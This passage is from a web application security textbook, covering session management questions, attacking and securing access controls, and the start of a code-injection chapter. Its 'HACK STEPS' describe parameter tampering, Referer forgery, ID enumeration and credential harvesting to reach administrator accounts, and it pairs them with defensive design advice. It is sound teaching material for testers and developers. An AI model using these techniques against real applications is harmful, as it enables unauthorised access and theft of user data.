browser, optionally with a pop-up message to inform you of what has occurred.

While this by no means removes the problem altogether, in certain cases it can

mitigate it substantially.

Chapter Summary

The session management mechanism provides a rich source of potential vul-

nerabilities for you to target when formulating your attack against an applica-

tion. Because of its fundamental role in enabling the application to identify the

same user across multiple requests, a broken session management function

usually provides the keys to the kingdom. Jumping into other users’ sessions

is good; hijacking an administrator’s session is even better, and will typically

enable you to compromise the entire application.

You can expect to encounter a wide range of defects in real-world session

management functionality. When bespoke mechanisms are employed, the

possible weaknesses and avenues of attack may appear to be endless. The

Chapter 7 ■ Attacking Session Management 213

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 213

most important lesson to draw from this topic is to be patient and determined.

Very many session management mechanisms that appear to be robust on first

inspection can be found wanting when analyzed closely. Deciphering the

method which an application uses to generate its sequence of seemingly ran-

dom tokens may take time and ingenuity. But given the reward, this is usually

an investment well worth making.

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. You log in to an application and the server sets the following cookie:

Set-cookie: sessid=amltMjM6MTI0MToxMTk0ODcwODYz;

An hour later, you log in again and receive the following:

Set-cookie: sessid=amltMjM6MTI0MToxMTk0ODc1MTMy;

What can you deduce about these cookies?

2. An application employs six-character alphanumeric session tokens and

five-character alphanumeric passwords. Both are randomly generated

according to an unpredictable algorithm. Which of these is likely to be

the most worthwhile target for a brute force guessing attack? List all of

the different factors that may be relevant to your decision.

3. You log in to an application at the following URL:

https://foo.wahh-app.com/login/home.php

and the server sets the following cookie:

Set-cookie: sessionId=1498172056438227; domain=foo.wahh-

app.com; path=/login; HttpOnly;

You then visit a range of other URLs. Which of the following will your

browser submit the

sessionId cookie to? (Select all that apply.)

(a)

https://foo.wahh-app.com/login/myaccount.php

(b) https://bar.wahh-app.com/login

(d) http://foo.wahh-app.com/login/myaccount.php

(e) http://foo.wahh-app.com/logintest/login.php

(f) https://foo.wahh-app.com/logout

(g) https://wahh-app.com/login/

(h) https://xfoo.wahh-app.com/login/myaccount.php

214 Chapter 7 ■ Attacking Session Management

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 214

4. The application you are targeting uses per-page tokens, in addition to

the primary session token. If a per-page token is received out of

sequence, then the entire session is invalidated. Suppose that you dis-

cover some defect that enables you to predict or capture the tokens

issued to other users who are currently accessing the application. Are

you able to hijack their sessions?

5. You log in to an application and the server sets the following cookie:

Set-cookie: sess=ab11298f7eg14;

When you click the logout button, this causes the following client-side

script to execute:

document.cookie=”sess=”;

document.location=”/“;

What conclusion would you draw from this behavior?

Chapter 7 ■ Attacking Session Management 215

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 215

70779c07.qxd:WileyRed 9/14/07 3:13 PM Page 216

217

Within the application’s core security mechanisms, access controls are logi-

cally built upon authentication and session management. So far, you have seen

how an application can first verify a user’s identity and then confirm that a

particular sequence of requests that it receives originated from the same user.

The primary reason that the application needs to do these things, in terms of

security at least, is because it needs a way of deciding whether it should per-

mit a given request to perform its attempted action or access the resources that

it is requesting. Access controls are a critical defense mechanism within the

application because they are responsible for making these key decisions.

When they are defective, an attacker can often compromise the entire applica-

tion, taking control of administrative functionality and accessing sensitive

data belonging to every other user.

As we noted in Chapter 1, broken access controls are among the most com-

monly encountered categories of web application vulnerability, affecting a

massive 78% of the applications recently tested by the authors. Somewhat

incredibly, it is extremely common to encounter applications that go to all the

trouble of implementing robust mechanisms for authentication and session

management, only to squander that investment by neglecting to build any

effective access controls upon them.

Access control vulnerabilities are conceptually very simple: the application

is letting you do something you shouldn’t be able to. The differences between

separate flaws really come down to the different ways in which this core defect

Attacking Access Controls

CHAPTER

70779c08v6.5.qxd 9/14/07 3:18 PM Page 217

is manifested, and the different techniques you need to employ to detect it. We

will describe all of these techniques, showing how you can exploit different

kinds of behavior within an application to perform unauthorized actions and

access protected data.

Common Vulnerabilities

Access controls can be divided into two broad categories: vertical and horizontal.

Vertical access controls allow different types of users to access different

parts of the application’s functionality. In the simplest case, this typically

involves a division between ordinary users and administrators. In more com-

plex cases, vertical access controls may involve fine-grained user roles grant-

ing access to specific functions, with each user being allocated to a single role,

or a combination of different roles.

Horizontal access controls allow users to access a certain subset of a wider

range of resources of the same type. For example, a web mail application may

allow you to read your email but no one else’s; an online bank may let you

transfer money out of your account only; and a workflow application may

allow you to update tasks assigned to you but only read tasks assigned to

other people.

In many cases, vertical and horizontal access controls are intertwined. For

example, an enterprise resource planning application may allow each accounts

payable clerk to pay invoices for a specific organizational unit and no other. The

accounts payable manager, on the other hand, may be allowed to pay invoices

for any unit. Similarly, clerks may be able to pay invoices for small amounts,

while larger invoices must be paid by the manager. The finance director may be

able to view invoice payments and receipts for every organizational unit in the

company but may not be permitted to pay any invoices at all.

Access controls are broken if any user is able to access functionality or

resources for which he is not authorized. There are two main types of attack

against access controls, corresponding to the two categories of control:

■■

Vertical privilege escalation occurs when a user can perform functions

that their assigned role does not permit them to. For example, if an

ordinary user can perform administrative functions or a clerk is able to

pay invoices of any size, then access controls are broken.

■■

Horizontal privilege escalation occurs when a user can view or modify

resources to which he is not entitled. For example, if you can use a web

mail application to read other people’s email, or if a payment clerk can

process invoices for an organizational unit other than his own, then

access controls are broken.

218 Chapter 8 ■ Attacking Access Controls

70779c08v6.5.qxd 9/14/07 3:18 PM Page 218

It is common to find cases where a vulnerability in the application’s hori-

zontal separation of privileges can lead immediately to a vertical escalation

attack. For example, if a user finds a way to set a different user’s password,

then the user can attack an administrative account and take control of the

application.

In the cases described so far, broken access controls enable users who have

authenticated themselves to the application in a particular user context to per-

form actions or access data for which that context does not authorize them.

However, in the most serious cases of broken access control, it may be possible

for completely unauthorized users to gain access to functionality or data that

is intended to be accessed only by privileged authenticated users.

Completely Unprotected Functionality

In many cases of broken access controls, sensitive functionality and resources

can be accessed by anyone who knows the relevant URL. For example, there

are many applications in which anyone who visits a specific URL is able to

make full use of its administrative functions:

https://wahh-app.com/admin/

In this situation, the application typically enforces access control only to the

following extent: users who have logged in as administrators see a link to this

URL on their user interface, while other users do not. This cosmetic difference

is the only mechanism in place to “protect” the sensitive functionality from

unauthorized use.

Sometimes, the URL that grants access to powerful functions may be less

easy to guess, and may even be quite cryptic, for example:

https://wahh-app.com/menus/secure/ff457/DoAdminMenu2.jsp

Here, access to administrative functions is protected by the assumption that

an attacker will not know or discover this URL. The application is harder for a

complete outsider to compromise, because they are less likely to guess the

URL by which they can do so.

COMMON MYTH “No low-privileged users will know that URL. We don’t

reference it anywhere within the application.”

In the example just described, the absence of any genuine access control still

constitutes a serious vulnerability, regardless of how easy it would be to guess

the URL. URLs do not have the status of secrets, either within the application

itself or in the hands of its users. They are displayed on-screen, and appear in

browser histories and the logs of web servers and proxy servers. Users may write

Chapter 8 ■ Attacking Access Controls 219

70779c08v6.5.qxd 9/14/07 3:18 PM Page 219

them down, bookmark them, or email them around. They are not normally

changed periodically, as passwords should be. When users change job roles, and

their access to administrative functionality needs to be withdrawn, there is no

way to delete their knowledge of a particular URL.

In some applications where sensitive functionality is hidden behind URLs

that are not trivial to guess, an attacker may often be able to identify these via

close inspection of client-side code. Many applications use JavaScript to build

the user interface dynamically within the client. This typically works by set-

ting various flags regarding the user’s status, and then adding individual ele-

ments to the UI on the basis of these. For example:

var isAdmin = false;

...

if (isAdmin)

{

adminMenu.addItem(“/menus/secure/ff457/addNewPortalUser2.jsp”,

“create a new user”);

}

Here, an attacker can simply review the JavaScript to identify URLs for

administrative functionality and attempt to access these. In other cases, HTML

comments may contain references to or clues about URLs that are not linked

from on-screen content. See Chapter 4 for a discussion of the various tech-

niques by which an attacker can gather information about hidden content

within the application.

Identifier-Based Functions

When a function of an application is used to gain access to a specific resource,

it is very common to see an identifier for the requested resource being passed

to the server in a request parameter, either within the URL query string or the

body of a

POST request. For example, an application may use the following

URL to display a specific document belonging to a particular user:

https://wahh-app.com/ViewDocument.php?docid=1280149120

When the user who owns the document is logged in, a link to this URL is

displayed on the user’s My Documents page. Other users do not see the link.

However, if access controls are broken, then any user who requests the rele-

vant URL may be able to view the document in exactly the same way as the

authorized user.

220 Chapter 8 ■ Attacking Access Controls

70779c08v6.5.qxd 9/14/07 3:18 PM Page 220

TIP This type of vulnerability often arises when the main application is

interfacing to an external system or back-end component. It can be difficult to

share a session-based security model between different systems that may be

based on diverse technologies. Faced with this problem, developers frequently

take a shortcut and move away from that model, using client-submitted

parameters to make access control decisions.

In this example, an attacker seeking to gain unauthorized access needs to

know not only the name of the application page (

ViewDocument.php) but also

the identifier of the document he wishes to view. Sometimes, resource identi-

fiers are generated in a highly unpredictable manner — for example, they may

be randomly chosen GUIDs. In other cases, they may be easily guessed — for

example, they may be sequentially generated numbers. However, the applica-

tion is vulnerable in both cases. As described previously, URLs do not have the

status of secrets, and the same applies to resource identifiers. Often, an

attacker wishing to discover the identifiers of other users’ resources will find

some location within the application that discloses these, such as access logs.

Even where an application’s resource identifiers cannot be easily guessed, it is

still vulnerable if it fails to properly control access to those resources. In cases

where the identifiers are easily predicted, the problem is even more serious

and more easily exploited.

TIP Application logs are often a gold mine of information, and may contain

numerous items of data that can be used as identifiers to probe functionality

that is accessed in this way. Identifiers commonly found within application logs

include: usernames, user ID numbers, account numbers, document IDs, user

groups and roles, and email addresses.

NOTE In addition to being used as references to data-based resources

within the application, this kind of identifier is also often used to refer to

functions of the application itself. As you saw in Chapter 4, an application may

deliver different functions via a single page, which accepts a function name or

identifier as a parameter. Again in this situation, access controls may run no

deeper than the presence or absence of specific URLs within the interfaces

of different types of user. If an attacker can determine the identifier for a

sensitive function, he may be able to access it in just the same way as a

more privileged user.

Chapter 8 ■ Attacking Access Controls 221

70779c08v6.5.qxd 9/14/07 3:18 PM Page 221

Multistage Functions

Many kinds of functions within an application are implemented across several

stages, involving multiple requests being sent from the client to the server. For

example, a function to add a new user may involve choosing this option from

a user maintenance menu, selecting the department and user role from drop-

down lists, and then entering the new username, initial password, and other

information.

It is common to encounter applications in which efforts have been made to

protect this kind of sensitive functionality from unauthorized access but where

the access controls employed are broken because of flawed assumptions about

the ways in which the functionality will be used.

In the previous example, when a user attempts to load the user maintenance

menu, and chooses the option to add a new user, the application may verify

that the user has the required privileges, and block access if the user does not.

However, if an attacker proceeds directly to the stage of specifying the user’s

department and other details, there may be no effective access control. The

developers unconsciously assumed that any user who reaches the later stages

of the process must have the relevant privileges because this was verified at

the earlier stages. The result is that any user of the application can add a new

administrative user account, and thereby take full control of the application,

gaining access to many other functions whose access control is intrinsically

robust.

The authors have encountered this type of vulnerability even in the most

security-critical web applications, those deployed by online banks. Making a

funds transfer in a banking application typically involves multiple stages,

partly to prevent users from accidentally making mistakes when requesting a

transfer. This multistage process involves capturing different items of data

from the user at each stage. This data is strictly checked when first submitted

and then is usually passed to each subsequent stage, using hidden fields in an

HTML form. However, if the application does not revalidate all of this data at

the final stage, then an attacker can potentially bypass the server’s checks. For

example, the application might verify that the source account selected for the

transfer belongs to the current user and then ask for details about the destina-

tion account and the amount of the transfer. If a user intercepts the final

POST

request of this process and modifies the source account number, she can exe-

cute a horizontal privilege escalation and transfer funds out of an account

belonging to a different user.

Static Files

In the majority of cases, users gain access to protected functionality and

resources by issuing requests to dynamic pages that execute on the server. It is

222 Chapter 8 ■ Attacking Access Controls

70779c08v6.5.qxd 9/14/07 3:18 PM Page 222

the responsibility of each such page to perform suitable access control checks,

and confirm that the user has the relevant privileges to perform the action that

they are attempting.

However, in some cases, requests for protected resources are made directly

to the static resources themselves, which are located within the web root of the

server. For example, an online publisher may allow users to browse its book

catalog and purchase ebooks for download. Once payment has been made, the

user is directed to a download URL like the following:

https://wahh-books.com/download/0636628104.pdf

Because this is a completely static resource, it does not execute on the server,

and its contents are simply returned directly by the web server. Hence, the

resource itself cannot implement any logic to verify that the requesting user

has the required privileges. When static resources are accessed in this way, it is

highly likely that there are no effective access controls protecting them and

that anyone who knows the URL naming scheme can exploit this to access any

resources they desire. In the present case, the document name looks suspi-

ciously like an ISBN, which would enable an attacker to quickly download

every ebook produced by the publisher!

Certain types of functionality are particularly prone to this kind of problem,

including financial web sites providing access to static documents about com-

panies such as annual reports, software vendors who provide downloadable

binaries, and administrative functionality that provides access to static log

files and other sensitive data collected within the application.

Insecure Access Control Methods

Some applications employ a fundamentally insecure access control model in

which access control decisions are made on the basis of request parameters

submitted by the client. In some versions of this model, the application deter-

mines a user’s role or access level at the time of login and from this point

onwards transmits this information via the client in a hidden form field,

cookie, or preset query string parameter (see Chapter 5). When each subse-

quent request is processed, the application reads this request parameter and

decides what access to grant the user accordingly.

For example, an administrator using the application may see URLs like the

following:

https://wahh-app.com/login/home.jsp?admin=true

while the URLs seen by ordinary users contain a different parameter, or none

at all. Any user who is aware of the parameter assigned to administrators can

Chapter 8 ■ Attacking Access Controls 223

70779c08v6.5.qxd 9/14/07 3:18 PM Page 223

simply set it in his own requests and thereby gain access to administrative

functions.

This type of access control may sometimes be difficult to detect without

actually using the application as a high-privileged user and identifying what

requests are made. The techniques described in Chapter 4 for discovering hid-

den request parameters may be successful in discovering the mechanism

when working only as an ordinary user.

In other unsafe access control models, the application uses the HTTP

Referer header as the basis for making access control decisions. For example,

an application may strictly control access to the main administrative menu,

based on a user’s privileges. But when a user makes a request for an individ-

ual administrative function, the application may simply check whether this

request was referred from the administrative menu page and assume that, if

so, then the user must have accessed that page and so have the required priv-

ileges. This model is fundamentally broken, of course, because the

Referer

header is completely within the control of the user and can be set to any value

at all.

Attacking Access Controls

Before starting to probe the application to detect any actual access control vul-

nerabilities, you should take a moment to review the results of your applica-

tion mapping exercises (see Chapter 4), to understand what the application’s

actual requirements are in terms of access control, and therefore where it will

probably be most fruitful to focus your attention.

HACK STEPS

Questions to consider when examining an application’s access controls include:

■ Do application functions give individual users access to a particular sub-

set of data that belongs to them?

■ Are there different levels of user, such as managers, supervisors, guests,

and so on, who are granted access to different functions?

■ Do administrators use functionality that is built into the same application

in order to configure and monitor it?

■ What functions or data resources within the application have you

identified that would most likely enable you to escalate your current

privileges?

224 Chapter 8 ■ Attacking Access Controls

70779c08v6.5.qxd 9/14/07 3:18 PM Page 224

The easiest and most effective way to test the effectiveness of an applica-

tion’s access controls is to access the application using different accounts, and

determine whether resources and functionality that can be accessed legiti-

mately by one account can be accessed illegitimately by another.

HACK STEPS

■ If the application segregates user access to different levels of functional-

ity, first use a powerful account to locate all of the available functionality

and then attempt to access this using a lower-privileged account.

■ If the application segregates user access to different resources (such as

documents), use two different user-level accounts to test whether access

controls are effective or whether horizontal privilege escalation is possi-

ble. Find a document that can be legitimately accessed by one user but

not by another, and attempt to access it using the second user’s

account — either by requesting the relevant URL or by submitting the

same POST parameters from within the second user’s session.

■ It may be possible to automate some of this testing by running a spider-

ing tool twice or more against the application, using a different user con-

text each time, and also in an unauthenticated context. To do this, run

the spider first as an administrator, and then obtain a session token for a

lower-privileged user and resubmit the same links but replace the privi-

leged session token with the lower-privileged token.

■ If a spidering session running as an ordinary user discovers privileged

functions to which only administrators should have access, then this may

represent a vulnerability. Note, however, that the effectiveness of this

method depends upon the exact behavior of the application: some appli-

cations provide all users with the same navigation links and return an

“access denied” message (in an HTTP 200 response) when an unautho-

rized function is requested.

If you have only one user-level account with which to access the application

(or none at all), then additional work needs to be done to test the effectiveness

of access controls. In fact, to perform a fully comprehensive test, further work

needs to be done in any case, because poorly protected functionality may exist

that is not explicitly linked from the interface of any application user — for

example, old functionality that has not yet been removed, or new functionality

that has been deployed but has not yet been published to users.

Chapter 8 ■ Attacking Access Controls 225

70779c08v6.5.qxd 9/14/07 3:18 PM Page 225

HACK STEPS

■ Use the content discovery techniques described in Chapter 4 to identify

as much of the application’s functionality as possible. Performing this

exercise as a low-privileged user is often sufficient to both enumerate

and gain direct access to sensitive functionality.

■ Where application pages are identified that are likely to present different

functionality or links to ordinary and administrative users (for example, a

Control Panel or My Home Page), try adding parameters like admin=true

to the URL query string and the body of POST requests, to determine

whether this uncovers or gives access to any additional functionality than

your user context has normal access to.

■ Test whether the application uses the Referer header as the basis for

making access control decisions. For key application functions that you

are authorized to access, try removing or modifying the Referer header

and determine whether your request is still successful. If not, the appli-

cation may be trusting the Referer header in an unsafe way.

■ Review all client-side HTML and scripts to find references to hidden func-

tionality or functionality that can be manipulated on the client side, such

as script-based user interfaces.

Once all accessible functionality has been enumerated, it is necessary to test

whether per-user segregation of access to resources is being correctly enforced.

In every instance where the application grants users access to a subset of a

wider range of resources of the same type (such as documents, orders, emails,

and personal details), there may be opportunities for one user to gain unau-

thorized access to other resources.

HACK STEPS

■ Where the application uses identifiers of any kind (document IDs,

account numbers, order references, etc.) to specify which resource a user

is requesting, attempt to discover the identifiers for resources to which

you do not have authorized access.

■ If it is possible to generate a series of such identifiers in quick succession

(for example, by creating multiple new documents or orders), use the same

techniques as were described in Chapter 8 for session tokens, to try to dis-

cover any predictable sequences in the identifiers the application produces.

■ If it is not possible to generate any new identifiers, then you are

restricted to analyzing the identifiers that you have already discovered,

or even using plain guesswork. If the identifier has the form of a GUID, it

is unlikely that any attempts based on guessing will be successful. How-

ever, if it is a relatively small number, try other numbers in close range,

or random numbers with the same number of digits.

226 Chapter 8 ■ Attacking Access Controls

70779c08v6.5.qxd 9/14/07 3:18 PM Page 226

HACK STEPS (continued)

■ If access controls are found to be broken, and resource identifiers are

found to be predictable, you can mount an automated attack to harvest

sensitive resources and information from the application. Use the tech-

niques described in Chapter 13 to design a bespoke automated attack to

retrieve the data you require.

A catastrophic vulnerability of this kind occurs where an Account

Information page displays a user’s personal details together with his

username and password. While the password is typically masked on-screen,

it is nevertheless transmitted in full to the browser. Here, you can often

quickly iterate through the full range of account identifiers to harvest the

shows Burp Intruder being used to carry out a successful attack of this kind.

TIP When you have detected an access control vulnerability, an immediate

attack to follow up with is to attempt to escalate your privileges further by

compromising a user account with administrative privileges. There are various

tricks you can use in trying to locate an administrative account. Using an

access control flaw like the one illustrated, you may harvest hundreds of user

credentials and not relish the task of logging in manually as every user until an

administrator is found. However, when accounts are identified by a sequential

numeric ID, it is very common to find that the lowest account numbers are

assigned to administrators. Logging in as the first few users who were

registered with the application will often identify an administrator. If this

approach fails, an effective method is to find a function within the application

where access is properly segregated horizontally — for example, the main home

page presented to each user. Write a script to log in using each set of captured

credentials, and then try to access your own home page. It is likely that

administrative users are able to view the home page of every user, so you will

immediately detect when an administrative account is being used.

Chapter 8 ■ Attacking Access Controls 227

70779c08v6.5.qxd 9/14/07 3:18 PM Page 227

In every instance where an application superficially appears to be enforcing

access controls effectively, you should probe further to determine whether any

defective assumptions have been made by developers.

HACK STEPS

■ Where an action is carried out in a multistep way, involving several dif-

ferent requests from client to server, test each request individually to

determine whether access controls have been applied to it.

■ Try to find any locations where the application is effectively assuming that

if you have reached a particular point, then you must have arrived via legiti-

mate means. Try to reach that point in other ways using a lower-privileged

account, to detect if any privilege escalation attacks are possible.

In cases where static resources that the application is protecting are ulti-

mately accessed directly via URLs to the resource files themselves, you should

test whether it is possible for unauthorized users to simply request these URLs

directly.

HACK STEPS

■ Step through the normal process for gaining access to a protected static

resource, to obtain an example of the URL by which it is ultimately

retrieved.

■ Using a different user context (for example, a less-privileged user or an

account that has not made a required purchase), attempt to access the

resource directly using the URL you have identified.

■ If this attack succeeds, try to understand the naming scheme being used

for protected static files. If possible, construct an automated attack to

trawl for content that may be useful or contain sensitive data (see

Chapter 13).

Securing Access Controls

Access controls are one of the easiest areas of web application security to

understand, although a well-informed, thorough methodology must be care-

fully applied when implementing them.

First, there are several obvious pitfalls to avoid. These usually arise from

ignorance about the essential requirements of effective access control or

228 Chapter 8 ■ Attacking Access Controls

70779c08v6.5.qxd 9/14/07 3:18 PM Page 228

flawed assumptions about the kinds of requests that users will make and

against which the application needs to defend itself:

■■

Do not rely on users’ ignorance of application URLs or the identifiers

used to specify application resources, such as account numbers and

document IDs. Explicitly assume that users know every application

URL and identifier, and ensure that the application’s access controls

alone are sufficient to prevent unauthorized access.

■■

Do not trust any user-submitted parameters to signify access rights

(such as

admin=true).

■■

Do not assume that users will access application pages in the intended

sequence. Do not assume that because users cannot access the Edit

Users page, they will not be able to reach the Edit User X page that is

linked from it.

■■

Do not trust the user not to tamper with any data that is transmitted via

the client. If some user-submitted data has been validated and is then

transmitted via the client, do not rely upon the retransmitted value

without revalidation.

The following represents a best-practice approach to implementing effective

access controls within web applications:

■■

Explicitly evaluate and document the access control requirements for

every unit of application functionality. This needs to include both who

can legitimately use the function and what resources individual users

may access via the function.

■■

Drive all access control decisions from the user’s session.

■■

Use a central application component to check access controls.

■■

Process every single client request via this component, to validate that

the user making the request is permitted to access the functionality and

resources being requested.

■■

Use programmatic techniques to ensure that there are no exceptions to

the previous point. An effective approach is to mandate that every

application page must implement an interface that is queried by the

central access control mechanism. By forcing developers to explicitly

code access control logic into every page, there can be no excuse for

omissions.

■■

For particularly sensitive functionality, such as administrative pages,

you can further restrict access by IP address, to ensure that only users

from a specific network range are able to access the functionality,

regardless of their login status.

Chapter 8 ■ Attacking Access Controls 229

70779c08v6.5.qxd 9/14/07 3:18 PM Page 229

■■

If static content needs to be protected, there are two methods of provid-

ing access control. First, static files can be accessed indirectly by passing

a file name to a dynamic server-side page which implements relevant

access control logic. Second, direct access to static files can be controlled

using HTTP authentication or other features of the application server to

wrap the incoming request and check the permissions for the resource

before granting access.

■■

Identifiers specifying which resource a user wishes to access are vulner-

able to tampering whenever they are transmitted via the client. The

server should trust only the integrity of server-side data. Any time

these identifiers are transmitted via the client, they need to be revali-

dated to ensure the user is authorized to access the requested resource.

■■

For security-critical application functions such as the creation of a

new bill payee in a banking application, consider implementing per-

transaction reauthentication and dual authorization to provide addi-

tional assurance that the function is not being used by an unauthorized

party. This will also mitigate the consequences of other possible attacks,

such as session hijacking.

■■

Log every event where sensitive data is accessed or a sensitive action is

performed. These logs will enable potential access control breaches to

be detected and investigated.

Web application developers often implement access control functions on a

piecemeal basis, adding code to individual pages in cases where they register

that some access control is required, and often cutting and pasting the same

code between pages to implement similar requirements. This approach carries

an inherent risk of defects in the resulting access control mechanism: many

cases are overlooked where controls are required, controls designed for one

area may not operate in the intended way in another area, and modifications

made elsewhere within the application may break existing controls by violat-

ing assumptions made by them.

In contrast to this approach, the previously described method of using a cen-

tral application component to enforce access controls has many benefits:

■■

It increases the clarity of access controls within the application,

enabling different developers to quickly understand the controls imple-

mented by others.

■■

It makes maintainability more efficient and reliable. Most changes will

only need to be applied once, to a single shared component, and will

not need to be cut and pasted to multiple locations.

230 Chapter 8 ■ Attacking Access Controls

70779c08v6.5.qxd 9/14/07 3:18 PM Page 230

■■

It improves adaptability. Where new access control requirements arise,

these can be easily reflected within an existing API implemented by

each application page.

■■

It results in fewer mistakes and omissions than if access control code is

implemented piecemeal throughout the application.

A Multi-Layered Privilege Model

Issues relating to access apply not only to the web application itself but also to

the other infrastructure tiers which lie beneath it — in particular, the applica-

tion server, the database, and the operating system. Taking a defense-in-depth

approach to security entails implementing access controls at each of these lay-

ers to create several layers of protection. This provides greater assurance

against threats of unauthorized access, because if an attacker succeeds in com-

promising defenses at one layer, the attack may yet be blocked by defenses at

another layer.

In addition to implementing effective access controls within the web appli-

cation itself, as already described, a multi-layered approach can be applied in

various ways to the components which underlie the application, for example:

■■

The application server can be used to control access to entire URL

paths, on the basis of user roles that are defined at the application

server tier.

■■

The application can employ a different database account when carrying

out the actions of different users. For users who should only be query-

ing (and not updating) data, an account with read-only privileges

should be used.

■■

Fine-grained control over access to different database tables can be

implemented within the database itself, using a table of privileges.

■■

The operating system accounts used to run each component in the

infrastructure can be restricted to the least powerful privileges that the

component actually requires.

In a complex security-critical application, layered defenses of this kind can

be devised with the help of a matrix defining the different user roles within the

application and the different privileges, at each tier, that should be assigned to

each role. Figure 8-1 is a partial example of a privilege matrix for a complex

application.

Chapter 8 ■ Attacking Access Controls 231

70779c08v6.5.qxd 9/14/07 3:18 PM Page 231

Figure 8-1: Example of a privilege matrix for a complex application

Within a security model of this kind, you can see how various useful access

control concepts can be applied:

■■

Programmatic control — The matrix of individual database privileges

is stored in a table within the database, and applied programmatically

to enforce access control decisions. The classification of user roles pro-

vides a shortcut for applying certain access control checks, and this is

also applied programmatically. Programmatic controls can be extremely

fine-grained and can build in arbitrarily complex logic into the process

of carrying out access control decisions within the application.

■■

Discretionary access control (DAC) — Administrators are able to dele-

gate their privileges to other users in relation to specific resources that

they own, employing discretionary access control. This is a closed DAC

model, in which access is denied unless explicitly granted. Administra-

tors are also able to lock or expire individual user accounts. This is an

open DAC model, in which access is permitted unless explicitly with-

drawn. Various application users have privileges to create user

accounts, again applying discretionary access control.

■■

Role-based access control (RBAC) — There are named roles, which

contain different sets of specific privileges, and each user is assigned to

one of these roles. This serves as a shortcut for assigning and enforcing

different privileges and is necessary to help manage access control in

complex applications. Using roles to perform upfront access checks on

user requests enables many unauthorized requests to be quickly

232 Chapter 8 ■ Attacking Access Controls

70779c08v6.5.qxd 9/14/07 3:18 PM Page 232

rejected with a minimum amount of processing being performed. An

example of this approach is in protecting the URL paths that specific

types of user may access.

When designing role-based access control mechanisms, it is necessary to

balance the number of roles so that they remain a useful tool to assist in

the management of privileges within the application. If too many fine-

grained roles are created, then the number of different roles becomes

unwieldy, and they are difficult to manage accurately. If too few roles are

created, the resulting roles will be a coarse instrument for managing

access, and it is likely that individual users will be assigned privileges

that are not strictly necessary for performance of their function.

■■

Declarative control — The application uses restricted database

accounts when accessing the database. It employs different accounts

for different groups of users, with each account having the least level of

privilege necessary for carrying out the actions which that group is per-

mitted to perform. Declarative controls of this kind are declared from

outside the application. This is a very useful application of defense-in-

depth principles, because privileges are being imposed on the applica-

tion by a different component. Even if a user finds a means of breaching

the access controls implemented within the application tier, so as to

perform a sensitive action such as adding a new user, they will be pre-

vented from doing so because the database account that they are using

does not have the required privileges within the database.

A different means of applying declarative access control exists at the

application server level, via deployment descriptor files, which are

applied during application deployment. However, these can be rela-

tively blunt instruments and do not always scale well to manage fine-

grained privileges in a large application.

HACK STEPS

If you are attacking an application that employs a multi-layered privilege model

of this kind, it is likely that many of the most obvious mistakes that are

commonly made in applying access controls will be defended against. You may

find that circumventing the controls implemented within the application does

not get you very far, because of protection in place at other layers. With this in

mind, there are still several potential lines of attack available to you. Most

importantly, understanding the limitations of each type of control, in terms of

the protection that it does not offer, will help to you identify the vulnerabilities

that are most likely to affect it:

■ Programmatic checks within the application layer may be susceptible to

injection-based attacks.

(continued)

Chapter 8 ■ Attacking Access Controls 233

70779c08v6.5.qxd 9/14/07 3:18 PM Page 233

HACK STEPS (continued)

■ Roles defined at the application server layer are often coarsely defined

and may be incomplete.

■ Where application components run using low-privileged operating sys-

tem accounts, these are still typically able to read many kinds of poten-

tially sensitive data within the host file system. Any vulnerabilities

granting arbitrary file access may still be usefully exploited.

■ Vulnerabilities within the application server software itself will typically

enable you to defeat all access controls implemented within the applica-

tion layer, but you may still have limited access to the database and

operating system.

■ A single exploitable access control vulnerability in the right location may

still provide a starting point for serious privilege escalation. For example,

if you discover a way to modify the role associated with your account,

then you may find that logging in again with that account gives you

enhanced access at both the application and database layers.

Chapter Summary

Access control defects can manifest themselves in various ways. In some cases,

they may be uninteresting, allowing illegitimate access to a harmless function

that cannot be leveraged to escalate privileges any further. In other cases, find-

ing a weakness in access controls can quickly lead to a complete compromise

of the application.

Flaws in access control can arise from various sources: a poor application

design may make it difficult or impossible to check for unauthorized access, a

simple oversight may leave only one or two functions unprotected, or defec-

tive assumptions about the way users will behave can leave the application

undefended when those assumptions are violated.

In many cases, finding a break in access controls is almost trivial — you sim-

ply request a common administrative URL and gain direct access to the func-

tionality. In other cases, it may be very hard, and subtle defects may lurk deep

within application logic, particularly in complex, high-security applications.

The most important lesson when attacking access controls is to look every-

where. If you are struggling to make progress, be patient and test every single

step of every application function. A bug that allows you to own the entire

application may be just around the corner.

234 Chapter 8 ■ Attacking Access Controls

70779c08v6.5.qxd 9/14/07 3:18 PM Page 234

Questions

Answers can be found at www.wiley.com/go/webhacker.

1. An application may use the HTTP

Referer header to control access

without any overt indication of this in its normal behavior. How can

you test for this weakness?

2. You log in to an application and are redirected to the following URL:

https://wahh-app.com/MyAccount.php?uid=1241126841

The application appears to be passing a user identifier to the

MyAccount.php page. The only identifier you are aware of is your

own. How can you test whether the application is using this

parameter to enforce access controls in an unsafe way?

3. A web application on the Internet enforces access controls by examining

users’ source IP addresses. Why is this behavior potentially flawed?

4. An application’s sole purpose is to provide a searchable repository of

information for use by members of the public. There are no authentica-

tion or session-handling mechanisms. What access controls should be

implemented within the application?

5. You are browsing an application and encounter several sensitive

resources that ought to be protected from unauthorized access, and that

have the

.xls file extension. Why should these immediately catch your

attention?

Chapter 8 ■ Attacking Access Controls 235

70779c08v6.5.qxd 9/14/07 3:18 PM Page 235

70779c08v6.5.qxd 9/14/07 3:18 PM Page 236

237

The topic of code injection is a huge one, encompassing dozens of different

languages and environments, and a wide variety of different attacks. It would

be possible to write an entire book on any one of these areas, exploring all of

the theoretical subtleties of how vulnerabilities can arise and be exploited.

Because this is a practical handbook, we will focus fairly ruthlessly on the

knowledge and techniques that you will need in order to exploit the code

injection flaws that exist in real-world applications.

SQL injection is the elder statesman of code injection attacks, being still one

of the more prevalent vulnerabilities in the wild, and frequently one of the

most devastating. It is also a highly fertile area of current research, and we will

explore in detail all of the latest attack techniques, including filter bypasses,

inference-based attacks, and fully blind exploitation.

We will also examine a host of other common code injection vulnerabilities,

including injection into web scripting languages, SOAP, XPath, email, LDAP,

and the server operating system. In each case, we will describe the practical

steps that you can take to identify and exploit these defects. There is a concep-

tual synergy in the process of understanding each new type of injection. Hav-

ing grasped the essentials of exploiting these half-dozen manifestations of the

flaw, you should be confident that you can draw on this understanding when

you encounter a new category of injection, and indeed devise additional

means of attacking those that others have already studied.

Injecting Code

CHAPTER

